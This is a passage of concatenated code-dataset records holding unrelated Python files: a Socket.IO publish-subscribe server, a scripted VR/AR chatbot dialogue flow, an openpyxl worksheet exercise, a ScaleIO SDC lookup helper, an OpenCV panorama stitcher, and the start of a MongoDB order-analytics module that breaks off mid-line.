f\"\\t{self._sid_ip_mapping[subscriber]}\\n\\t\"\n\n if topic.content is None or topic.timestamp is None:\n topic_status = (\n f\"\\ntopic name:\\t{topic.name}\\n\\nsubscribers:{subscribers}\\nThere was no publish on this topic yet.\"\n )\n else:\n topic_status = f\"\\ntopic name:\\t{topic.name}\\n\\ntimestamp:\\t{datetime.fromtimestamp(int(topic.timestamp)).strftime('%d-%m-%Y %H:%M:%S')}\\n\\ncontent:\\t{topic.content}\\n\\nsubscribers:{subscribers}\"\n\n response = TransportMessage(timestamp=int(time.time()), payload=topic_status)\n else:\n # Topic not existing\n response = TransportMessage(timestamp=int(time.time()), payload=f\"{data.topic} does not exist.\")\n\n await self.sio.emit(\"PRINT_MESSAGE_AND_EXIT\", response.json(), room=sid)\n logging.info(\"%s - %s\", self._sid_ip_mapping[sid], response.payload)\n\n async def update_topic(self, topic: Topic) -> None:\n \"\"\"Called when a topic is updated.\n The subscribers of the topic will receive the updated topic.\n\n :param topic: The topic\n \"\"\"\n topic.last_update = int(time.time())\n response = TransportMessage(\n timestamp=int(time.time()),\n payload=f\"{topic.name} ({datetime.fromtimestamp(int(topic.timestamp)).strftime('%d-%m-%Y %H:%M:%S')}): {topic.content}\",\n )\n for sub in topic.subscribers:\n await self.sio.emit(\"PRINT_MESSAGE\", response.json(), room=sub)\n\n async def heart_beat(self, time_delta):\n \"\"\"Go through all topics and check if they were updated in the last time_delta seconds.\n If not, update the topic.\n\n :param time_delta: Time in seconds\n \"\"\"\n for topic in self._list_of_topics:\n if topic.last_update is not None and int(time.time()) - topic.last_update > time_delta:\n await self.update_topic(topic)\n logging.info(\"Topic %s was updated through heart beat.\", topic.name)\n\n def _get_topic_by_name(self, name: str) -> Optional[Topic]:\n \"\"\"Get a topic by its name.\n\n :param name: Name of the topic\n :return: Topic object\n \"\"\"\n for topic in self._list_of_topics:\n if topic.name == name:\n return topic\n return None\n\n def _add_topic(self, topic: Topic) -> None:\n \"\"\"Add a topic to the list of topics.\n\n :param topic: Topic object\n \"\"\"\n with self._lock:\n self._list_of_topics.append(topic)\n\n def _remove_topic(self, topic: Topic) -> None:\n \"\"\"Remove a topic from the list of topics.\n\n :param topic: Topic object\n \"\"\"\n with self._lock:\n logging.warning(\"Topic %s was removed.\", topic.name)\n self._list_of_topics.remove(topic)\n\n\ndef get_app():\n \"\"\"Create an ASGI application for the server.\n\n :return: ASGI application\n \"\"\"\n server = Server()\n application = web.Application(logger=None)\n\n server.sio.attach(application)\n\n timer = ParallelTimer(server)\n timer.start()\n\n return application\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(prog=\"server.py\", description=\"Starts a server for publisher subscriber system\")\n parser.add_argument(\n \"-p\", \"--port\", type=str, help=\"Port to run the server on. Default is 8080\", default=8080, metavar=\"STRING\"\n )\n parser.add_argument(\n \"--host\", type=str, help=\"Host to run the server on. Default is localhost\", default=\"127.0.0.1\", metavar=\"STRING\"\n )\n params = parser.parse_args()\n\n # wrap with ASGI application\n app = get_app()\n web.run_app(app, host=params.host, port=params.port)\n","repo_name":"DHBW-FN-TIT20/verteilte-systeme-ffdms","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":15076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1887084395","text":"from emora_stdm import KnowledgeBase, DialogueFlow, NatexNLU\nfrom enum import Enum, auto\n\n\n\n# Define the states that your conversation will use\n# All states that you use in transitions later need to be in this class\n\nclass State(Enum):\n S0 = auto()\n U0 = auto()\n S1A = auto()\n S1B = auto()\n U1 = auto()\n S2_google = auto()\n S2_htc = auto()\n S2_samsung = auto()\n S2_oculus = auto()\n S2_playstation = auto()\n U2 = auto()\n S3A = auto()\n S3B = auto()\n U3A = auto()\n U3B = auto()\n S4A = auto()\n S4B = auto()\n S4C = auto()\n U4 = auto()\n S5A = auto()\n S5B = auto()\n U5 = auto()\n S6_ugly= auto()\n S6_expensive = auto()\n U6 = auto()\n S7A = auto()\n S7B = auto()\n U7 = auto()\n S8A = auto()\n S8B = auto()\n U8 = auto()\n S9 = auto()\n U9 = auto()\n S10A = auto()\n S10B = auto()\n U10 = auto()\n END = auto()\n ERR = auto()\n\n\nVR_company = {\"ontology\":\n {\n \"company\":\n [\n \"google\",\n \"htc\",\n \"samsung\",\n \"oculus\"\n ],\n \"ontgoogle\":\n [\n \"cardboard\",\n \"google\"\n ],\n \"onthtc\":\n [\n \"vive\",\n \"htc\"\n ],\n \"ontsamsung\":\n [\n \"gear\",\n \"samsung\"\n ],\n \"ontoculus\":\n [\n \"rift\",\n \"oculus\"\n ],\n \"ontsony\":\n [\n \"morpheus\",\n \"vr\",\n \"sony\",\n \"playstation\"\n ]\n }\n }\n\n\nknowledge = KnowledgeBase()\nknowledge.load_json(VR_company)\ndf = DialogueFlow(State.S0, initial_speaker=DialogueFlow.Speaker.SYSTEM, kb=knowledge)\n\n#Initalize Yes, Yes+vr, and No for first question\n\n\n\ndf.add_system_transition(State.S0, State.U0, r'[!Have you ever used Virtual Reality before\"?\"]')\n\n#Yes+VR Company Answer\ndf.add_user_transition(State.U0, State.S2_google, \"<$VR=#ONT(ontgoogle)>\")\ndf.add_user_transition(State.U0, State.S2_htc, \"<$VR=#ONT(onthtc)>\")\ndf.add_user_transition(State.U0, State.S2_samsung, \"<$VR=#ONT(ontsamsung)>\")\ndf.add_user_transition(State.U0, State.S2_oculus, \"<$VR=#ONT(ontoculus)>\")\ndf.add_user_transition(State.U0, State.S2_playstation, \"<$VR=#ONT(ontsony)>\" )\n\ndf.add_system_transition(State.S2_google, State.U2, r'[!Google Cardboard is really amazing and my personal favorite, it lets anyone with a smartphone '\n r'experience the future with Virtual Reality\"!\" When was the last time you tried VR \"?\"]')\n\ndf.add_system_transition(State.S2_htc, State.U2, r'[!HTC Vive, although expensive, uses futuristic 3D tracked controllers to let you '\n r'feel even closer to the Virtual Environment\"!\" When was the last time you tried VR \"?\"]')\n\ndf.add_system_transition(State.S2_samsung, State.U2, r'[!Samsung Gear are glasses that make use of a samsung phone along with a controller '\n r'to allow you to do cool things like browse the web or watch netflix in a seemingly theater \"-\" sized room\"!\" '\n r'When did you try it last \"?\"]')\n\ndf.add_system_transition(State.S2_oculus, State.U2, r'[!Oculus Rift was the first PC powered gaming headset, letting you delve into your '\n r'favorite games\"!\" When was the last time you tried VR\"?\"]')\n\ndf.add_system_transition(State.S2_playstation, State.U2, r'[!Playstation morpheus was revolutionary to bring the full VR experience to console gaming'\n r' \"!\" When was the last time you tried VR \"?\"]')\n\n\n\n#Yes Answer\nyes_natex = NatexNLU('{yes,yeah,have}')\ndf.add_user_transition(State.U0, State.S1B, yes_natex)\ndf.add_system_transition(State.S1B, State.U1, r'[!Which VR system model did you use \"?\"]')\ndf.add_user_transition(State.U1, State.S2_google, \"<$VR=#ONT(ontgoogle)>\")\ndf.add_user_transition(State.U1, State.S2_htc, \"<$VR=#ONT(onthtc)>\")\ndf.add_user_transition(State.U1, State.S2_samsung, \"<$VR=#ONT(ontsamsung)>\")\ndf.add_user_transition(State.U1, State.S2_oculus, \"<$VR=#ONT(ontoculus)>\")\ndf.add_user_transition(State.U1, State.S2_playstation, \"<$VR=#ONT(ontsony)>\")\n\n\n#No Answer\nno = r\"[{no,not really, not}]\"\nno_natex = NatexNLU(no)\ndf.add_user_transition(State.U0, State.S1A, no_natex)\ndf.add_system_transition(State.S1A, State.U4, r'[!Oh that is unfortunate, you should definitely try it sometime \",\" VR is slowly becoming the future of gaming and even '\n r' industrial uses. My favorite is Google Cardboard because of how accessible it is to everyone \"!\" Another emerging area'\n r' is augmented reality, why do you think it would be growing so quickly compared to VR \"?\"]')\n\n\n#Time since used\n#Short Time\n\nshort= r\"[{today,hour,hours,yesterday,week,weeks,day, days,month,months}]\"\nshort_natex = NatexNLU(short)\n\ndf.add_user_transition(State.U2, State.S3A, short_natex)\ndf.add_system_transition(State.S3A, State.U3A, r'[!Thats great \"!\" You may have used one of the newer models with many new features such as higher resolution displays and '\n r' faster refresh rates to help with motion sickness \"!\" What about your $VR headset captivated you to buy one \"?\"]')\n\nsentence_natex = NatexNLU('/.*/')\ndf.add_user_transition(State.U3A, State.S4A, sentence_natex)\ndf.add_system_transition(State.S4A, State.U4, r'[!That is a really good reason \"!\" Just wait, with time this technology will progress so much more \"!\" But, there has been '\n r'a decrease in the progression of VR, as it gives way to Augmented Reality \"(\"AR\")\". Do you know why this could be \"?\"]')\n\n#Long Time\nlong= r\"[{year,years,long,while}]\"\nlong_natex = NatexNLU(long)\n\ndf.add_user_transition(State.U2, State.S3B, long_natex)\ndf.add_system_transition(State.S3B, State.U3B, r'[!It may have been some time since you have used a $VR headset, there have been many new upgrades since the older models. '\n r' Did you remember ever feeling motion sickness or nauseousness from using the headset \"?\"]')\n\nyes_nat = r\"[{yes,yeah,have,did}]\"\nyes_natex_reader = NatexNLU(yes_nat)\ndf.add_user_transition(State.U3B, State.S4B, yes_natex_reader)\ndf.add_system_transition(State.S4B, State.U4, r'[!You most likely felt sick because the older generation of headsets had lower resolution screens and low refresh rates '\n r'that would cause motion sickness. Today\",\" computation has gotten much more efficient and these issues have been mostly '\n r'allieviated. But, there has been a decrease in the progression of VR, as it gives way to '\n r'Augmented Reality \"(\"AR\")\". Do you know why this could be \"?\"]')\n\ndf.add_user_transition(State.U3B, State.S4C, no_natex)\ndf.add_system_transition(State.S4C, State.U4, r'[!That is really interesting\",\" studies have found 40 to 60 percent of people on VR headsets were motion sick after playing. '\n r'But, there has been a decrease in the progression of VR, as it gives way to Augmented Reality \"(\"AR\")\". Do you know'\n r' why this could be \"?\"]')\n\n\n#AR Section:\n#Gaming\ngame = r\"[{game,games,gaming}]\"\ngame_natex = NatexNLU(game)\ndf.add_user_transition(State.U4, State.S5B, game_natex)\ndf.add_system_transition(State.S5B, State.U6, r'[!Gaming has been one of the forefronts of AR today. Companies like Apple are pushing '\n r' things such as the ARkit, bringing games to the space around you with the aid of the camera.'\n r' The most popularized AR game has been pokemon go, do you know why this may be the case \"?\"]' )\n\n\n\n\n#Glasses\nglass = r\"[{glass,glasses,wearable,wearables}]\"\nglass_natex = NatexNLU(glass)\ndf.add_user_transition(State.U4, State.S5A, glass_natex)\ndf.add_system_transition(State.S5A, State.U5, r'[!Different types of AR glasses have slowly been growing in popularity, '\n r'but why do you think they are not as common \"?\"]')\n\n#why not glasses\n#Ugly\nugly = r\"[{ugly,clunky,poor ergonomics,bad,dont,stylish,fashionable}]\"\nugly_natex = NatexNLU(ugly)\ndf.add_user_transition(State.U5, State.S6_ugly, ugly_natex)\ndf.add_system_transition(State.S6_ugly, State.U6, r'[!That is very true. Glasses today have become more of a fashion statement\",\" and '\n r'the aesthetics of todays AR glasses are not pleasing. But AR is '\n r'still accessible to everyone\",\" pokemon go revolutionized the way mobile games can be '\n r'played\",\" why do you think they were so successful \"?\"]')\n\n#Expensive\nexpensive = r\"[{pricey,expensive,money,cost}]\"\nexpensive_natex = NatexNLU(expensive)\ndf.add_user_transition(State.U5, State.S6_expensive, expensive_natex)\ndf.add_system_transition(State.S6_expensive, State.U6, r'[!Because of the low amount of AR glasses in the market and their complex design\",\" '\n r'they are very expensive compared to regular prescription glasses. '\n r'But AR is still accssible to everyone\",\" pokemon go revolutionized '\n r'the way mobile gaming can be played\",\" why do you think this is \"?\"]')\n\n\n#Reasons for Pokemon Go success\n#Health\nhealth = r\"[{physical,exercise,roam,outdoors,outside,walk,walking,adventure,nature,sun,sunlight}]\"\nhealth_natex = NatexNLU(health)\ndf.add_user_transition(State.U6, State.S7A ,health_natex)\ndf.add_system_transition(State.S7A, State.U7, r'[!This game is so unique because it encourages individuals to go outside and'\n r' move around to progress in the game. In a world where individuals'\n r' are glued to their phone, this is revolutionary, and only made '\n r'possible through the power of AR. As of now, AR is a digital overlay over the reality we have now\",\" '\n r'how do you think this will effect the people as it becomes more mainstream \"?\"]')\n\n#Social Interaction\nsocial = r\"[{social,interaction,talk,interact,friends,communication,teamwork}]\"\nsocial_natex = NatexNLU(social)\ndf.add_user_transition(State.U6, State.S7B ,social_natex)\ndf.add_system_transition(State.S7B, State.U7, r'[!Pokemon Go has a powerful ability to increase physical '\n r'social interactions rather than the virtual one found in other games. As of now, AR is a digital overlay over the reality we have now\",\" '\n r'how do you think this will effect the people as it becomes more mainstream \"?\"]' )\n\n\n\n#Effects of AR\n#positive\npositive = r\"[{efficiency,good,positive,positively}]\"\npositive_natex = NatexNLU(positive)\ndf.add_user_transition(State.U7, State.S8A ,positive_natex)\ndf.add_system_transition(State.S8A, State.U8, r'[!The effects of AR is highly debated. I believe that AR has the power to improve'\n r' human life by giving a constant monitoring of metrics such as our health. It can play'\n r' such a huge role in daily life such as how we shop for things or even '\n r'improve the technical training of complex medical procedures. Studies have even shown that'\n r' schools that implement AR mobile learning have students with higher attention and satisfaction \"!\" How do you feel '\n r'about the current state of mobile AR\"?\"]')\n\n\n#Negative\nnegative = r\"[{distractions,distraction,distracted,distract,unaware annoying,negative,antisocial}]\"\nnegative_natex = NatexNLU(negative)\ndf.add_user_transition(State.U7, State.S8B ,negative_natex)\ndf.add_system_transition(State.S8B, State.U8, r'[!I can see why you would think about the negative impacts of AR. Even with pokemon go, many people got hurt while'\n r' distractedly roaming the streets. Even more dangerous would be to have a screen always in our vision while '\n r'doing daily tasks such as driving. Still, this technology will have a future, it just has to be carefully'\n r' thought out and implemented to preserve safety. How do you feel '\n r'about the current state of VR and mobile AR\"?\"]')\n\n\n#Current State of Mobile AR\ndf.add_user_transition(State.U8, State.S9, sentence_natex)\n\n#Is AR a good investment today\ndf.add_system_transition(State.S9, State.U9, r'[!Do you think that augmented and virtual realities are developed enough and good investments for people to make today, to push'\n r' forward the technology \"?\"]')\n#AR/VR is developed enough\ndf.add_user_transition(State.U9, State.S10A, yes_nat)\ndf.add_system_transition(State.S10A, State.U10, r'[!Although AR and VR may seem a little gimmicky right now, there is a lot of potential and fun to be had with '\n r'the current technology today \"!\"AR and VR are the futures of gaming '\n r'and entertainment, but they also have many commercial and educational uses.'\n r' The next stage of this technology will be Mixed Reality, where virtual and mutatable objects can be placed in '\n r'an augmented world. The future is very exciting and all of this is coming much quicker than we expect \"!\" '\n r'I hope you will invest in AR and VR products in the future \"!\"]')\n\n#More time is still needed\ndf.add_user_transition(State.U9, State.S10B, no_natex)\ndf.add_system_transition(State.S10B, State.U10, r'[!AR and VR may seem not as impressive just yet, but as more people start to invest in these products, '\n r'the more content that will be created by developers \"!\" AR and VR are the futures of gaming and'\n r' entertainment, but they also have many commercial and educational uses.'\n r' The next stage of this technology will be Mixed Reality, where virtual and mutatable objects can be placed in '\n r'an augmented world. The future is very exciting and all of this is coming much quicker than we expect \"!\" '\n r'I hope you will invest in AR and VR products in the future \"!\"]')\n\n\ndf.add_user_transition(State.U10, State.END, \"/.*/\")\ndf.add_system_transition(State.END, State.END, r'[!Thank you for the wonderful conversation, have a nice rest of your day \"!\"]')\n\n\n\n#ERROR STATES\ndf.add_system_transition(State.ERR, State.ERR, r\"[!Oops...I Broke]\")\ndf.set_error_successor(State.U0, error_successor=State.S1B)\ndf.set_error_successor(State.U1, error_successor=State.S2_google)\ndf.set_error_successor(State.U2, error_successor=State.S3A)\ndf.set_error_successor(State.U3A, error_successor=State.S4C)\ndf.set_error_successor(State.U3B, error_successor=State.S4C)\ndf.set_error_successor(State.U4, error_successor=State.S5B)\ndf.set_error_successor(State.U5, error_successor=State.S6_ugly)\ndf.set_error_successor(State.U6, error_successor=State.S7A)\ndf.set_error_successor(State.U7, error_successor=State.S8A)\ndf.set_error_successor(State.U8, error_successor=State.S9)\ndf.set_error_successor(State.U9, error_successor=State.S10B)\n\n\n\n\ndf.run(debugging=False)","repo_name":"emora-chat/emora_stdm_zoo","sub_path":"virtual_reality1.py","file_name":"virtual_reality1.py","file_ext":"py","file_size_in_byte":16709,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37562405087","text":"import openpyxl as opx\nimport datetime as dt\n\"\"\"\n# 两种方法获取工作簿test.xlsx中所有的工作表的表名\np1 = r'D:\\Git_Reps\\SoftTest\\B01_02 常用Python包学习\\B01_02 10 Python_Excel\\002 Docs\\test.xlsx'\nw1 = opx.load_workbook(p1)\nwss = w1.worksheets\nfor i in wss:\n print(i.title)\n\"\"\"\n\"\"\"\n# 除了9号的工作表以外都删除\np2 = r'D:\\Git_Reps\\SoftTest\\B01_02 常用Python包学习\\B01_02 10 Python_Excel\\002 Docs\\test1653298766.xlsx'\nwb2 = opx.load_workbook(p2)\nwss2 = wb2.worksheets\nfor i in wss2:\n if i.title != '9号':\n wb2.remove(i)\n\nwb2.save(p2)\n\"\"\"\n\n# 新建100张工作表 1-100号\np3 = r'D:\\Git_Reps\\SoftTest\\B01_02 常用Python包学习\\B01_02 10 Python_Excel\\002 Docs\\anki_test_202205231751.xlsx'\n\nwb3 = opx.Workbook(p3)\nfor i in range(100):\n wb3.create_sheet(\"{}号\".format(i))\n\nwb3.save(p3)\n\n\n\n\n\n\n\n\n\n","repo_name":"T-Better/SoftTest","sub_path":"B01_02 常用Python包学习/B01_02 10 Python_Excel/练习/2022/anki_excel_20220523_01.py","file_name":"anki_excel_20220523_01.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"24331564672","text":"from helperSIO.helper import *\n\n# Get all SDCs\ndef getSDCs(sio):\n res =doGet(sio, \"/api/types/Sdc/instances\")\n return json.loads(res.content)\n\ndef sdcIdByName(sio, name):\n sdcs = getSDCs(sio)\n for sdc in sdcs:\n if sdc[\"name\"] == name:\n return sdc[\"id\"]\n print(\"SDC with name '{}' Not Found\".format(name))\n return None\n","repo_name":"VijayEMC/scaleioSDK","sub_path":"sdc.py","file_name":"sdc.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12457409714","text":"import cv2 \nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nOUTPUT_FILE = 'output/'\nINPUT_FILE = 'input/'\n\nransacReprojThreshold = 3\nGOOD_MATCH_RATIO = 0.7\nRESIZE_RATIO = 4\n\nclass Stitcher(object):\n\t\"\"\"docstring for Stitch\"\"\"\n\tdef __init__(self, imageList):\n\t\tself.image_list = imageList\n\t\tself.image_number = len(self.image_list)\n\t\tself.homographies = [None] * self.image_number\n\t\tself.resize_image(RESIZE_RATIO)\n\t\tself.get_homography_pairs()\n\n\tdef resize_image(self,resize_factor):\n\t\tif self.image_list:\n\t\t\tnew_image = []\n\t\t\tfor image in self.image_list:\n\t\t\t\tnew_image.append(cv2.resize(image,(int(image.shape[1]/resize_factor), \\\n\t\t\t\t\t\t\t\t\t\t\t\t int(image.shape[0]/resize_factor))))\n\t\t\tself.image_list = new_image\n\t\telse:\n\t\t\tprint('empty image_list')\n\n\n\tdef get_homography_pairs(self):\n\n\t\tkp_img_src, kp_src, des_src = self.sift_kp_des(self.image_list[0])\n\t\tkp_img_dst, kp_dst, des_dst = self.sift_kp_des(self.image_list[0])\n\t\tgood_kp = self.get_good_match(des_src, des_dst)\n\t\tptsA = np.float32([kp_src[m.queryIdx].pt for m in good_kp])\n\t\tH, status = cv2.findHomography(ptsA,ptsA,cv2.RANSAC,ransacReprojThreshold)\n\t\tself.homographies[0] = H\n\n\t\tfor idx in range(0,self.image_number-1):\n\t\t\tsrc_idx = idx\n\t\t\tdst_idx = idx+1\n\n\t\t\tkp_img_src, kp_src, des_src = self.sift_kp_des(self.image_list[src_idx])\n\t\t\tkp_img_dst, kp_dst, des_dst = self.sift_kp_des(self.image_list[dst_idx])\n\t\t\tgood_kp = self.get_good_match(des_src, des_dst)\n\n\t\t\toutput = cv2.drawMatches(kp_img_src,kp_src,kp_img_dst,kp_dst,good_kp,None,flags=2)\n\t\t\tplt.imshow(output)\n\t\t\tplt.show()\n\t\t\tcv2.imwrite(OUTPUT_FILE + 'good_kp{}-{}.jpg'.format(src_idx,dst_idx), output)\n\n\t\t\tif len(good_kp) > 4:\n\t\t\t\tptsA = np.float32([kp_dst[m.trainIdx].pt for m in good_kp])\n\t\t\t\tptsB = np.float32([kp_src[m.queryIdx].pt for m in good_kp])\n\t\t\t\tH, status = cv2.findHomography(ptsA,ptsB,cv2.RANSAC,ransacReprojThreshold)\n\t\t\t\tself.homographies[dst_idx] = H\n\n\tdef get_pair_stitch(self):\n\t\tfor idx in range(1,self.image_number):\n\t\t\tstationary_img = self.image_list[idx-1]\n\t\t\tperspective_img = self.image_list[idx]\n\t\t\tperspective_output = cv2.warpPerspective(perspective_img, self.homographies[idx], \\\n\t\t\t\t\t\t\t\t\t\t\t(stationary_img.shape[1]+perspective_img.shape[1], stationary_img.shape[0]))\n\t\t\tcv2.imwrite(OUTPUT_FILE + 'perspective{}.jpg'.format(idx), perspective_output)\n\t\t\tstationary_ouptput = cv2.warpPerspective(stationary_img, self.homographies[0], \\\n\t\t\t\t\t\t\t\t\t\t\t(stationary_img.shape[1]+perspective_img.shape[1], stationary_img.shape[0]))\n\t\t\tresult = self.blend_image(stationary_ouptput,perspective_output)\n\t\t\tcv2.imwrite(OUTPUT_FILE + 'pair{}-{}.jpg'.format(idx-1,idx), result)\n\n\tdef get_total_stitch(self):\n\t\tperspective_list = self.image_list\n\t\tshape = [-1200,0]\n\t\tfor i in self.image_list:\n\t\t\tshape[0] += i.shape[1]\n\t\t\tshape[1] = i.shape[0]\n\t\tfinal = np.float32([[[0]*3]*shape[0]]*shape[1])\n\n\t\tfor idx_H,H in enumerate(self.homographies):\n\t\t\tfor idx_i,image in enumerate(perspective_list):\n\t\t\t\tif idx_i >= idx_H:\n\t\t\t\t\tperspective_list[idx_i] = cv2.warpPerspective(image, H, \\\n\t\t\t\t\t\t\t(shape[0], shape[1]))\n\t\t# now blend\n\t\tfor i in perspective_list:\n\t\t\tfinal = self.blend_image(final,i)\n\t\tcv2.imwrite(OUTPUT_FILE + 'panaroma.jpg', final)\n\t\t# for idx in range(self.image_number):\n\t\t# \tfor i in self.image_list:\n\t\t# \tstationary_img = self.image_list[idx-1]\n\t\t# \tperspective_img = self.image_list[idx]\n\n\t@staticmethod\n\tdef blend_image(stationary,perspective):\n\t\tgray = cv2.cvtColor(perspective, cv2.COLOR_BGR2GRAY)\n\t\tfor i in range(gray.shape[0]):\n\t\t\tfor j in range(gray.shape[1]):\n\t\t\t\tif gray[i][j] != 0:\n\t\t\t\t\tstationary[i][j] = perspective[i][j]\n\t\treturn stationary\n\t\t\n\n\t@staticmethod\n\tdef sift_kp_des(img):\n\t\tsift = cv2.xfeatures2d.SIFT_create()\n\t\tkp, des = sift.detectAndCompute(img, None)\n\t\tkp_img = cv2.drawKeypoints(img, kp, None)\n\t\treturn kp_img, kp, des\n\n\t@staticmethod\n\tdef get_good_match(des1,des2):\n\t\tFLANN_INDEX_KDTREE = 0\n\t\tindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n\t\tsearch_params = dict(checks=50)\n\t\tflann = cv2.FlannBasedMatcher(index_params,search_params)\n\t\tmatches = flann.knnMatch(des1,des2,k=2)\n\n\t\tgood_kp = []\n\t\tfor (i,j) in matches:\n\t\t\tif i.distance < GOOD_MATCH_RATIO * j.distance:\n\t\t\t\tgood_kp.append(i)\n\t\treturn good_kp\n\nsource_img_1 = cv2.imread(INPUT_FILE + '1.jpg', cv2.IMREAD_COLOR)\nsource_img_2 = cv2.imread(INPUT_FILE + '2.jpg', cv2.IMREAD_COLOR)\nsource_img_3 = cv2.imread(INPUT_FILE + '3.jpg', cv2.IMREAD_COLOR)\nsource_img_4 = cv2.imread(INPUT_FILE + '4.jpg', cv2.IMREAD_COLOR)\n\n\nstitch = Stitcher([source_img_1,source_img_2,source_img_3,source_img_4])\nstitch.get_pair_stitch()\nstitch.get_total_stitch()\n\n\n\n\n\n\n\n\t\t\t\n\t\t\t\n\t\t\t\t\t\n\n\n\n\n\n\t\t\n\t\t\n","repo_name":"w-dq/Image-Stitching_CV","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73323210987","text":"from datetime import datetime, timedelta\n\nfrom bson.objectid import ObjectId\n\nfrom models import db\n\n\nMAX_ORDERID = -1\n\n# projection for unknown page\nUNKNOWN_PROJECT = [\n {\n \"$addFields\": {\n \"_id\": {\"$toString\": \"$_id\"},\n \"takenaAt\": {\n \"$dateToString\": {\n \"format\": \"%Y/%m/%d %H:%M\",\n \"date\": \"$takenAt\",\n }\n },\n }\n },\n {\"$project\": {\"content\": 1, \"notes\": 1, \"takenAt\": 1}},\n {\"$project\": {\"content.id\": 0, \"content.category\": 0}},\n]\n\n\ndef find_by_time(start, end):\n return {\"takenAt\": {\"$gte\": start, \"$lte\": end}, \"state\": \"end\"}\n\n\ndef get_raw_history(start, end):\n return db.ORDER_COLLECTION.find(\n find_by_time(start, end),\n {\n \"content.id\": 0,\n \"content.category\": 0,\n \"_id\": 0,\n \"takenAt\": 0,\n \"state\": 0,\n \"total\": 0,\n \"userName\": 0,\n },\n )\n\n\ndef build_analysis_struct(interval, slot):\n result = {\n \"interval\": [],\n \"itemAnalysis\": {},\n \"genderAnalysis\": [\n {\"female\": 0, \"male\": 0, \"total\": 0} for i in range(slot)\n ],\n }\n for i in range(slot):\n if i == slot - 1:\n result[\"interval\"].append(\"{}+\".format(i * interval))\n else:\n result[\"interval\"].append(\n \"{}-{}\".format(i * interval, interval * (i + 1) - 1)\n )\n return result\n\n\ndef get_analysis_data(start, end):\n interval = 10\n slot = 7\n result = build_analysis_struct(interval, slot)\n # query\n raw_data = db.ORDER_COLLECTION.aggregate(\n [\n {\"$match\": find_by_time(start, end)},\n {\n \"$lookup\": {\n \"from\": \"user\",\n \"localField\": \"userName\",\n \"foreignField\": \"userName\",\n \"as\": \"user\",\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"content.name\": 1,\n \"content.quantity\": 1,\n \"user.birth\": 1,\n \"user.gender\": 1,\n \"user.userName\": 1,\n \"takenAt\": 1,\n }\n },\n {\n \"$unwind\": {\n \"path\": \"$user\",\n \"preserveNullAndEmptyArrays\": False,\n }\n },\n ]\n )\n # first calc\n for data in raw_data:\n age = (data[\"takenAt\"] - data[\"user\"][\"birth\"]).days // 365\n index = min(age // interval, slot - 1)\n # build gender analysis\n result[\"genderAnalysis\"][index][data[\"user\"][\"gender\"]] += 1\n # build item analysis\n for content in data[\"content\"]:\n if content[\"name\"] not in result[\"itemAnalysis\"]:\n result[\"itemAnalysis\"][content[\"name\"]] = {\n \"female\": [0] * slot,\n \"male\": [0] * slot,\n \"sum\": [0] * slot,\n \"femaleTotal\": 0,\n \"maleTotal\": 0,\n \"total\": 0,\n }\n result[\"itemAnalysis\"][content[\"name\"]][data[\"user\"][\"gender\"]][\n index\n ] += content[\"quantity\"]\n # sum\n for genderAnalysis in result[\"genderAnalysis\"]:\n genderAnalysis[\"total\"] = (\n genderAnalysis[\"female\"] + genderAnalysis[\"male\"]\n )\n for itemAnalysis in result[\"itemAnalysis\"].values():\n itemAnalysis[\"femaleTotal\"] = sum(itemAnalysis[\"female\"])\n itemAnalysis[\"maleTotal\"] = sum(itemAnalysis[\"male\"])\n itemAnalysis[\"sum\"] = [\n itemAnalysis[\"male\"][i] + itemAnalysis[\"female\"][i]\n for i in range(slot)\n ]\n itemAnalysis[\"total\"] = (\n itemAnalysis[\"femaleTotal\"] + itemAnalysis[\"maleTotal\"]\n )\n return result\n\n\ndef get_max_orderid():\n result = list(\n db.ORDER_COLLECTION.aggregate(\n [\n {\"$addFields\": {\"orderID\": {\"$toInt\": \"$orderID\"}}},\n {\"$group\": {\"_id\": None, \"max\": {\"$max\": \"$orderID\"}}},\n ]\n )\n )\n if len(result) == 0:\n return 0\n else:\n return result[0][\"max\"]\n\n\ndef get_not_end_by_username(user_name):\n return db.ORDER_COLLECTION.aggregate(\n [\n {\n \"$match\": {\n \"userName\": user_name,\n \"state\": {\"$nin\": [\"end\"]},\n \"takenAt\": {\"$gte\": datetime.now() - timedelta(days=1)},\n }\n },\n {\n \"$addFields\": {\n \"takenAt\": {\n \"$dateToString\": {\n \"format\": \"%Y/%m/%d %H:%M\",\n \"date\": \"$takenAt\",\n }\n },\n \"_id\": {\"$toString\": \"$_id\"},\n }\n },\n {\n \"$project\": {\n \"createdAt\": 0,\n \"userName\": 0,\n \"total\": 0,\n \"content.id\": 0,\n \"content.type\": 0,\n }\n },\n ]\n )\n\n\ndef add_order(data):\n def build_business_time(time_str):\n result = data[\"takenAt\"][:-6] + \"-\" + time_str\n return datetime.strptime(result, \"%Y-%m-%d-%H:%M\")\n\n # init max orderid\n global MAX_ORDERID\n if MAX_ORDERID == -1:\n MAX_ORDERID = get_max_orderid()\n\n # convert data to correct type\n taken_at = datetime.strptime(data[\"takenAt\"], \"%Y-%m-%dT%H:%M\")\n business_time = list(\n db.BUSINESS_COLLECTION.find_one({}, {\"_id\": 0}).values()\n )\n business_time = business_time[taken_at.isoweekday() - 1]\n start = build_business_time(business_time[\"start\"])\n end = build_business_time(business_time[\"end\"])\n print(datetime.now(), taken_at)\n # check if content is empty, takenAt is > now and in business interval\n if (\n start <= taken_at <= end\n and len(data[\"content\"]) > 0\n and taken_at > datetime.now()\n ):\n MAX_ORDERID += 1\n for meal in data[\"content\"]:\n meal[\"id\"] = ObjectId(meal[\"id\"])\n tar_col = {\n \"item\": db.ITEM_COLLECTION,\n \"combo\": db.COMBO_COLLECTION,\n }\n tar = 